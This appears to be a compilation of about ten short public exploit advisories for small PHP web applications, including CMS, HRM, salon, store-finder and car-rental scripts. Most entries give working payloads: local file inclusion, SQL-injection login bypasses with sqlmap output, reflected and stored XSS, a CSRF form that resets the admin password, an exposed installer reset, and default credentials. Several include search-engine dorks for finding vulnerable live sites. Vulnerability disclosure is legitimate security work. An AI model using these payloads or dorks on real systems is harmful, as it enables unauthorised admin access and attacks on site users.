<pre><code>====================================================================================================================================<br />| # Title : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] LFI Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://lulus.smkn2purwokerto.sch.id/admin.zip | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] the infected file : index.php<br /><br /> <?php<br /><br /> require "config.php";<br /> error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));<br /> $page=$_GET['page'];<br /> $filename="content/$page.php";<br /> if (!file_exists($filename))<br /> {<br /> include "content/home.php";<br /> }<br /> else<br /> {@include "content/$page.php";}<br /> ?><br /><br />[+] LFI : /index.php?page= [Ev!l]<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : AGVirtues Galeria v2.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/ |<br />| # Dork : galeria/album.php?id= |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user & pass : ADMIN' OR 1=1#<br /><br />[+] http://wexpomarmorecombr/galeria/admin/album.php <br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Archon CMS V3.14 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.archon.org/ |<br />| # Dork : Archive powered by Archon Version 3.14 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : archive/index.php?id=34309'"()%26%25<acx><ScRiPt >prompt(908835)</ScRiPt>&p=collections/findingaid&q=&rootcontentid=104040<br /><br />[+] http://127.0.0.1/polishjewsyivoorg/archive/index.php?id=34309%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908835)%3C/ScRiPt%3E&p=collections/findingaid&q=&rootcontentid=104040<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Beauty Salon Management System v1.0 - SQLi<br /># Date of found: 04/07/2023<br /># Exploit Author: Fatih Nacar<br /># Version: V1.0<br /># Tested on: Windows 10<br /># Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/><br /># Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/<br /># CWE: CWE-89<br /><br />Vulnerability Description -<br /><br />Beauty Salon Management System: V1.0, developed by Campcodes, has been<br />found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability<br />allows an attacker to manipulate login authentication with the SQL queries<br />and bypass authentication. The system fails to properly validate<br />user-supplied input in the username and password fields during the login<br />process, enabling an attacker to inject malicious SQL code. By exploiting<br />this vulnerability, an attacker can bypass authentication and gain<br />unauthorized access to the system.<br /><br />Steps to Reproduce -<br /><br />The following steps outline the exploitation of the SQL Injection<br />vulnerability in Beauty Salon Management System V1.0:<br /><br />1. Open the admin login page by accessing the URL:<br />http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php<br /><br />2. In the username and password fields, insert the following SQL Injection<br />payload shown inside brackets to bypass authentication for usename<br />parameter:<br /><br />{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374<br />ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign<br />In}<br /><br />3.Execute the SQL Injection payload.<br /><br />As a result of successful exploitation, the attacker gains unauthorized<br />access to the system and is logged in with administrative privileges.<br /><br />Sqlmap results:<br /><br />POST parameter 'username' is vulnerable. Do you want to keep testing the<br />others (if any)? [y/N] y<br /><br />sqlmap identified the following injection point(s) with a total of 793<br />HTTP(s) requests:<br /><br />---<br /><br />Parameter: username (POST)<br /><br />Type: boolean-based blind<br /><br />Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /><br />Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374<br />ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign<br />In<br /><br />Type: time-based blind<br /><br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /><br />Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--<br />rvYF&password=test&login=Sign In<br /><br />---<br /><br />[15:58:56] [INFO] the back-end DBMS is MySQL<br /><br />web application technology: PHP 8.2.4, Apache 2.4.56<br /><br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br /><br /></code></pre>
<pre><code>#Title : Super Store Finder PHP Script SQL Injection / Bypass admin login<br />#Researcher : Etharus<br />#Vendor : Joe Iz, https://superstorefinder.net/<br />#Script Demo Url : https://superstorefinder.net/products/superstorefinder/<br />#Version Affected : 3.6 and below<br />#Date : 5 July 2023<br />#FOFA Dork : "designed and built by Joe Iz."<br /># Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/<br /># Step 2 : Enter following payload<br /><br />username : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -<br />password : admin<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/car-rental-php-script.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Car Rental Script 1.8 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1<br /><br />payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1<br />-----------------------------------------------<br /><br />POST parameter 'first_name' is vulnerable to XSS<br />POST parameter 'second_name' is vulnerable to XSS<br />POST parameter 'phone' is vulnerable to XSS<br />POST parameter 'address_1' is vulnerable to XSS<br />POST parameter 'country' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car<br />2. Inject your [XSS Payload] in "First Name"<br />3. Inject your [XSS Payload] in "Last Name"<br />4. Inject your [XSS Payload] in "Phone"<br />5. Inject your [XSS Payload] in "Address Line 1"<br />6. Inject your [XSS Payload] in "Country"<br /><br /><br />7. Accept with terms & Press [Booking]<br /> XSS Fired on Local User Browser<br /><br />8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)<br /> XSS Will Fire and Executed on his Browser<br /><br />9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br /> <br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Allhandsmarketing LMS v2.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.allhandsmarketing.com/ | <br />| # Dork : " Design by Allhandsmarketing." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin Password.<br /><br />[+] Go to the line 1.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /backend/add_newPassword.php .<br /><br />[+] save code as poc.html .<br /><br />[+] default user : admin<br /><br />[+] <form class="form-horizontal" action="http://TARGET/backend/add_newPassword.php" name="form2" id="form2"><br /><br /> <fieldset><br /><br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="password" id="password" class="form-control" placeholder="Your new password." type="password"><br /> </div><br /> </div><br /><br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()"><br /><br /> </div><br /> </div><br /> <br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="newEmail" value="" class="form-control" type="email"><br /><br /> </div><br /> </div><br /> <br /> </fieldset><br /><br /> <div class=""><br /> <div class="row"><br /> <div class="col-md-12"><br /> <button class="btn btn-default" type="clear"><br /> Cancel<br /> </button><br /><br /> <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit"><br /> <i class="fa fa-save"></i><br /> Submit<br /> </button><br /> </div><br /> </div><br /> </div><br /><br /> </form><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Adveris CMS v3.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | <br />| # Vendor : http://adveris.fr | <br />| # Dork : "Création site internet : Adveris" inurl:.php?id= |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /sous-categorie.php?id=6<--`<script>alert(/indoushka/);</script>``> --!><br /><br />[+] http://w127.0.0.1/coveprofr/sous-categorie.php?id=6%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Advanced HRM v1.6 Reset admin login Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/advanced-hrm/17767006 | <br />| # Dork : "Copyright © CoderPixel 2016 All Rights Reserved" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] The Vulnerability revolves around resetting script settings and reformulating a new password for the admin .<br /><br />[+] use payload : /application/install/step5.php<br /><br />[+] http://127.0.0.1/appchain.commy/hrm/application/install/step5.php<br /><br />[+] Congratulations!<br /> You have just install Advance HRM!<br /> To Login Admin Portal:<br /> Use this link - http://127.0.0.1/appchain.commy/hrm/<br /> Username: admin<br /> Password: admin.password<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ADMINA BULGARIA Ltd v 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://admina.me/ | <br />| # Dork : " ADMINA BULGARIA Ltd.. All Rights Reserved. ." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] user : admina & pass : 0000<br /><br />[+] http://127.0.0.1/res-clusterorg/admina/ <====| Login<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>